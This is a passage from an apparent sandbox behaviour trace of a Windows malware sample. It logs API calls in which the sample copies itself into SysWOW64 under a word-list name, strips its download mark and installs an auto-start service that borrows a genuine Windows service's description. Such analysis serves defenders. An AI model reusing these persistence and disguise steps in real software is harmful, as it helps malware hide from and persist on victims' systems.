szExeFile="SearchUI.exe")) returned 1 [0111.710] GetCurrentProcessId () returned 0xe88 [0111.710] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="commands xerox relationship.exe")) returned 1 [0111.710] GetCurrentProcessId () returned 0xe88 [0111.710] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice-cu-characteristic.exe")) returned 1 [0111.711] GetCurrentProcessId () returned 0xe88 [0111.711] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0111.711] GetCurrentProcessId () returned 0xe88 [0111.712] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="assuming.exe")) returned 1 [0111.712] GetCurrentProcessId () returned 0xe88 [0111.712] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fantasy-snap-charity.exe")) returned 1 [0111.713] GetCurrentProcessId () returned 0xe88 [0111.713] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="node_selections.exe")) returned 1 [0111.714] GetCurrentProcessId () returned 0xe88 [0111.714] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knitting.exe")) returned 1 [0111.714] GetCurrentProcessId () returned 0xe88 [0111.714] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="numericromancejake.exe")) returned 1 [0111.715] GetCurrentProcessId () returned 0xe88 [0111.715] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="casio flavor.exe")) returned 1 [0111.715] GetCurrentProcessId () returned 0xe88 [0111.715] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="friday_escape_populations.exe")) returned 1 [0111.716] GetCurrentProcessId () returned 0xe88 [0111.716] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kg-tools.exe")) returned 1 [0111.717] GetCurrentProcessId () returned 0xe88 [0111.717] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strengths_affected.exe")) returned 1 [0111.717] GetCurrentProcessId () returned 0xe88 [0111.717] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="broadcast officers.exe")) returned 1 [0111.718] GetCurrentProcessId () returned 0xe88 [0111.718] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bulgariageneratingprogram.exe")) returned 1 [0111.718] GetCurrentProcessId () returned 0xe88 [0111.718] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="orlando.exe")) returned 1 [0111.719] GetCurrentProcessId () returned 0xe88 [0111.719] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="facial_violence.exe")) returned 1 [0111.719] GetCurrentProcessId () returned 0xe88 [0111.719] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings ownership printable.exe")) returned 1 [0111.720] GetCurrentProcessId () returned 0xe88 [0111.720] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0111.720] GetCurrentProcessId () returned 0xe88 [0111.720] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.721] GetCurrentProcessId () returned 0xe88 [0111.721] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sample.exe")) returned 1 [0111.721] GetCurrentProcessId () returned 0xe88 [0111.721] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe78, pcPriClassBase=13, dwFlags=0x0, szExeFile="sample.exe")) returned 1 [0111.722] GetCurrentProcessId () returned 0xe88 [0111.722] CloseHandle (hObject=0xac) returned 1 [0111.722] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEME78") returned 6 [0111.722] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEME78") returned 0xac [0111.722] GetLastError () returned 0xb7 [0111.722] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEEE78") returned 6 [0111.722] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEEE78") returned 0xb4 [0111.722] SetEvent (hEvent=0xb4) returned 1 [0111.724] CloseHandle (hObject=0xb4) returned 1 [0111.724] CloseHandle (hObject=0xac) returned 1 [0111.724] GetWindowsDirectoryW (in: lpBuffer=0x19fc90, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0111.724] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x415a04, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x415a04*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0111.725] _snwprintf (in: _Dest=0x19fe18, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\ID2CA4DEF") returned 16 [0111.725] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\ID2CA4DEF") returned 0xac [0111.725] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x0) returned 0x0 [0111.725] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\MD2CA4DEF") returned 16 [0111.725] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\MD2CA4DEF") returned 0xb4 [0111.725] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\ED2CA4DEF") returned 16 [0111.725] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\ED2CA4DEF") returned 0xb8 [0111.725] SignalObjectAndWait (hObjectToSignal=0xb8, hObjectToWaitOn=0xb4, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0111.725] ResetEvent (hEvent=0xb8) returned 1 [0111.725] ReleaseMutex (hMutex=0xac) returned 1 [0111.725] CloseHandle (hObject=0xac) returned 1 [0111.725] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76c70000 [0111.726] _snwprintf (in: _Dest=0x19fea8, _Count=0x40, _Format="LDWCN%X" | out: _Dest="LDWCND2CA4DEF") returned 13 [0111.726] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0111.726] RegisterClassExW (param_1=0x19ff48) returned 0xc16b [0111.726] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0111.726] CreateWindowExW (dwExStyle=0x0, lpClassName="LDWCND2CA4DEF", lpWindowName=0x0, dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xf0036 [0113.876] GetTickCount () returned 0x20e0f [0113.876] SetTimer (hWnd=0xf0036, nIDEvent=0x114b68f, uElapse=0x3e8, lpTimerFunc=0x40cce0) returned 0x114b68f [0113.876] GetTickCount () returned 0x20e0f [0113.876] GetTickCount () returned 0x20e0f [0113.876] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0113.876] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0113.876] DispatchMessageW (lpMsg=0x19ff2c) returned 0x0 [0113.877] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0113.877] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0114.872] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0114.872] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114ba77 [0114.872] GetTickCount () returned 0x211f7 [0114.872] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0114.872] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0115.874] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0115.874] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114be5f [0115.874] GetTickCount () returned 0x215df [0115.874] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0115.874] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0116.875] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0116.875] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114c247 [0116.875] GetTickCount () returned 0x219c7 [0116.875] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0116.875] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0117.874] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0117.874] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114c62f [0117.874] GetTickCount () returned 0x21daf [0117.874] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0117.874] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0118.874] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0118.874] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114ca17 [0118.874] GetTickCount () returned 0x22197 [0118.874] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0118.874] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0119.874] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0119.874] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1 [0119.874] GetTickCount () returned 0x2257f [0119.874] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x77550000 [0119.874] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x75310000 [0126.909] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6469a0 [0126.934] CloseServiceHandle (hSCObject=0x6469a0) returned 1 [0126.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4183f8, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe")) returned 0x28 [0126.935] lstrlenA (lpString="not,ripple,svcs,serv,wab,shader,single,without,wcs,define,eap,culture,slide,zip,tmpl,mini,polic,panes,earcon,menus,detect,form,uuidgen,pnp,admin,tuip,avatar,started,dasmrc,alaska,guids,wfp,adam,wgx,lime,indexer,repl,dev,mapi,resw,daf,diag,iss,vsc,turned,neutral,sat,source,enroll,mfidl,idl,based,right,cbs,radar,avg,wordpad,metagen,mouse,iprop,mdmmcd,jersey,thunk,subs") returned 368 [0126.935] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x4181f0 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0126.938] _snwprintf (in: _Dest=0x417ee0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 38 [0126.938] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sample.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0126.939] CreateFileMappingW (hFile=0x1b8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1c0 [0126.939] MapViewOfFile (hFileMappingObject=0x1c0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x760000 [0126.939] GetFileSize (in: hFile=0x1b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e708 [0126.939] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x760000, Length=0x6e708) returned 0x69cea440 [0126.942] UnmapViewOfFile (lpBaseAddress=0x760000) returned 1 [0126.946] CloseHandle (hObject=0x1c0) returned 1 [0126.946] CloseHandle (hObject=0x1b8) returned 1 [0126.946] GetComputerNameW (in: lpBuffer=0x19fcc0, nSize=0x19fcf0 | out: lpBuffer="LHNIWSJ", nSize=0x19fcf0) returned 1 [0126.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="LHNIWSJ", cchWideChar=-1, lpMultiByteStr=0x19fce0, cbMultiByte=16, lpDefaultChar=0x650520, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LHNIWSJ", lpUsedDefaultChar=0x0) returned 8 [0126.946] _snprintf (in: _Dest=0x4180e8, _Count=0x104, _Format="%s_%08X" | out: _Dest="LHNIWSJ_D2CA4DEF") returned 16 [0126.947] lstrlenA (lpString="steps,intel,cyan,sbs,emit,graph,work,fix,restore,select,bml,iprop,reports,balloon,hop,symbol,mddefw,cyrl,map,shims,iface,portto,ras,eula,pdh,sync,etl,wpc,dsm,cat,archive,pass,did,rule,compile,bundle,merged,keyand,android,compare,stg,mnu,lanes,dir,dmi,lime,route,tap,cch,msra,running,boost,jit,diala,fetch,tabbtn,sendand,vert,imp,the,clear,role,drv,readme") returned 354 [0126.947] _snwprintf (in: _Dest=0x19faec, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\eulacompile.exe") returned 35 [0126.947] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\eulacompile.exe" (normalized: "c:\\windows\\syswow64\\eulacompile.exe")) returned 0 [0126.948] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe", lpString2="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned -1 [0126.951] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0126.951] GetFileAttributesW (lpFileName="C:\\Windows\\" (normalized: "c:\\windows")) returned 0x10 [0126.951] GetFileAttributesW (lpFileName="C:\\Windows\\SysWOW64\\" (normalized: "c:\\windows\\syswow64")) returned 0x10 [0126.951] SHFileOperationW (in: lpFileOp=0x19fcd4*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe", pTo="C:\\Windows\\SysWOW64\\indexerneutral.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="婍\x90\x03") | out: lpFileOp=0x19fcd4*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sample.exe", pTo="C:\\Windows\\SysWOW64\\indexerneutral.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="婍\x90\x03")) returned 0 [0130.647] _snwprintf (in: _Dest=0x19f8c4, _Count=0x104, _Format="%s:Zone.Identifier" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe:Zone.Identifier") returned 54 [0130.648] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.exe:Zone.Identifier" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe:zone.identifier")) returned 0 [0130.648] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x668ac0 [0130.649] _snwprintf (in: _Dest=0x19fae8, _Count=0x104, _Format="\"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"") returned 40 [0130.649] CreateServiceW (in: hSCManager=0x668ac0, lpServiceName="indexerneutral", lpDisplayName="indexerneutral", dwDesiredAccess=0x12, dwServiceType=0x10, dwStartType=0x2, dwErrorControl=0x0, lpBinaryPathName="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x668e30 [0130.661] EnumServicesStatusExW (in: hSCManager=0x668ac0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19facc, lpServicesReturned=0x19fac4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19facc, lpServicesReturned=0x19fac4, lpResumeHandle=0x0) returned 0 [0130.662] GetLastError () returned 0xea [0130.663] EnumServicesStatusExW (in: hSCManager=0x668ac0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x68a1b0, cbBufSize=0x60c6, pcbBytesNeeded=0x19facc, lpServicesReturned=0x19fac4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x68a1b0, pcbBytesNeeded=0x19facc, lpServicesReturned=0x19fac4, lpResumeHandle=0x0) returned 1 [0130.664] GetTickCount () returned 0x24fac [0130.664] OpenServiceW (hSCManager=0x668ac0, lpServiceName="BFE", dwDesiredAccess=0x1) returned 0x668ea8 [0130.665] QueryServiceConfig2W (in: hService=0x668ea8, dwInfoLevel=0x1, lpBuffer=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fac8 | out: lpBuffer=0x0, pcbBytesNeeded=0x19fac8) returned 0 [0130.666] GetLastError () returned 0x7a [0130.666] QueryServiceConfig2W (in: hService=0x668ea8, dwInfoLevel=0x1, lpBuffer=0x6530a0, cbBufSize=0x2a4, pcbBytesNeeded=0x19fac8 | out: lpBuffer=0x6530a0, pcbBytesNeeded=0x19fac8) returned 1 [0130.666] CloseServiceHandle (hSCObject=0x668ea8) returned 1 [0130.668] ChangeServiceConfig2W (hService=0x668e30, dwInfoLevel=0x1, lpInfo=0x6530a0*(lpDescription="The Base Filtering Engine (BFE) is a service that manages firewall and Internet Protocol security (IPsec) policies and implements user mode filtering. Stopping or disabling the BFE service will significantly reduce the security of the system. It will also result in unpredictable behavior in IPsec management and firewall applications.")) returned 1 [0130.668] StartServiceW (hService=0x668e30, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 0 [0143.544] CloseServiceHandle (hSCObject=0x668e30) returned 1 [0143.544] _snwprintf (in: _Dest=0x19f8cc, _Count=0x104, _Format="%X" | out: _Dest="DC0CE277") returned 8 [0143.544] OpenServiceW (hSCManager=0x668ac0, lpServiceName="DC0CE277", dwDesiredAccess=0x10000) returned 0x0 [0143.545] CloseServiceHandle (hSCObject=0x668ac0) returned 1 [0143.545] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x0 [0143.545] DestroyWindow (hWnd=0xf0036) returned 1 [0143.548] UnregisterClassW (lpClassName="LDWCND2CA4DEF", hInstance=0x0) returned 1 [0143.548] ExitProcess (uExitCode=0x0) Thread: id = 4 os_tid = 0xe90 Thread: id = 5 os_tid = 0xc2c Thread: id = 6 os_tid = 0xc3c Thread: id = 7 os_tid = 0xad4 Thread: id = 8 os_tid = 0x51c Thread: id = 9 os_tid = 0x510 Process: id = "3" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xe88" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2777 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2778 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2779 start_va = 0x3800000000 end_va = 0x3800000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003800000000" filename = "" Region: id = 2780 start_va = 0x3800010000 end_va = 0x3800010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003800010000" filename = "" Region: id = 2781 start_va = 0x3800020000 end_va = 0x3800020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003800020000" filename = "" Region: id = 2782 start_va = 0x3800030000 end_va = 0x380004ffff entry_point = 0x0 region_type = private name = "private_0x0000003800030000" filename = "" Region: id = 2783 start_va = 0x3800050000 end_va = 0x380006ffff entry_point = 0x0 region_type = private name = "private_0x0000003800050000" filename = "" Region: id = 2784 start_va = 0x3800070000 end_va = 0x380008ffff entry_point = 0x0 region_type = private name = "private_0x0000003800070000" filename = "" Region: id = 2785 start_va = 0x3800090000 end_va = 0x38000affff entry_point = 0x0 region_type = private name = "private_0x0000003800090000" filename = "" Region: id = 2786 start_va = 0x38000b0000 end_va = 0x38000cffff entry_point = 0x0 region_type = private name = "private_0x00000038000b0000" filename = "" Region: id = 2787 start_va = 0x38000d0000 end_va = 0x38000effff entry_point = 0x0 region_type = private name = "private_0x00000038000d0000" filename = "" Region: id = 2788 start_va = 0x38000f0000 end_va = 0x380010ffff entry_point = 0x0 region_type = private name = "private_0x00000038000f0000" filename = "" Region: id = 2789 start_va = 0x3800110000 end_va = 0x380012ffff entry_point = 0x0 region_type = private name = "private_0x0000003800110000" filename = "" Region: id = 2790 start_va = 0x3800130000 end_va = 0x380014ffff entry_point = 0x0 region_type = private name = "private_0x0000003800130000" filename = "" Region: id = 2791 start_va = 0x3800150000 end_va = 0x380016ffff entry_point = 0x0 region_type = private name = "private_0x0000003800150000" filename = "" Region: id = 2792 start_va = 0x3800170000 end_va = 0x380018ffff entry_point = 0x0 region_type = private name = "private_0x0000003800170000" filename = "" Region: id = 2793 start_va = 0x3800190000 end_va = 0x38001affff entry_point = 0x0 region_type = private name = "private_0x0000003800190000" filename = "" Region: id = 2794 start_va = 0x38001b0000 end_va = 0x38001cffff entry_point = 0x0 region_type = private name = "private_0x00000038001b0000" filename = "" Region: id = 2795 start_va = 0x38001d0000 end_va = 0x38001effff entry_point = 0x0 region_type = private name = "private_0x00000038001d0000" filename = "" Region: id = 2796 start_va = 0x38001f0000 end_va = 0x380020ffff entry_point = 0x0 region_type = private name = "private_0x00000038001f0000" filename = "" Region: id = 2797 start_va = 0x3800210000 end_va = 0x380022ffff entry_point = 0x0 region_type = private name = "private_0x0000003800210000" filename = "" Region: id = 2798 start_va = 0x3800230000 end_va = 0x380024ffff entry_point = 0x0 region_type = private name = "private_0x0000003800230000" filename = "" Region: id = 2799 start_va = 0x3800250000 end_va = 0x380026ffff entry_point = 0x0 region_type = private name = "private_0x0000003800250000" filename = "" Region: id = 2800 start_va = 0x3800270000 end_va = 0x380028ffff entry_point = 0x0 region_type = private name = "private_0x0000003800270000" filename = "" Region: id = 2801 start_va = 0x3800290000 end_va = 0x38002affff entry_point = 0x0 region_type = private name = "private_0x0000003800290000" filename = "" Region: id = 2802 start_va = 0x38002b0000 end_va = 0x38002cffff entry_point = 0x0 region_type = private name = "private_0x00000038002b0000" filename = "" Region: id = 2803 start_va = 0x38002d0000 end_va = 0x38002effff entry_point = 0x0 region_type = private name = "private_0x00000038002d0000" filename = "" Region: id = 2804 start_va = 0x38002f0000 end_va = 0x380030ffff entry_point = 0x0 region_type = private name = "private_0x00000038002f0000" filename = "" Region: id = 2805 start_va = 0x3800310000 end_va = 0x380032ffff entry_point = 0x0 region_type = private name = "private_0x0000003800310000" filename = "" Region: id = 2806 start_va = 0x3800330000 end_va = 0x380034ffff entry_point = 0x0 region_type = private name = "private_0x0000003800330000" filename = "" Region: id = 2807 start_va = 0x3800350000 end_va = 0x380036ffff entry_point = 0x0 region_type = private name = "private_0x0000003800350000" filename = "" Region: id = 2808 start_va = 0x3800370000 end_va = 0x380038ffff entry_point = 0x0 region_type = private name = "private_0x0000003800370000" filename = "" Region: id = 2809 start_va = 0x3800390000 end_va = 0x38003affff entry_point = 0x0 region_type = private name = "private_0x0000003800390000" filename = "" Region: id = 2810 start_va = 0x38003b0000 end_va = 0x38003cffff entry_point = 0x0 region_type = private name = 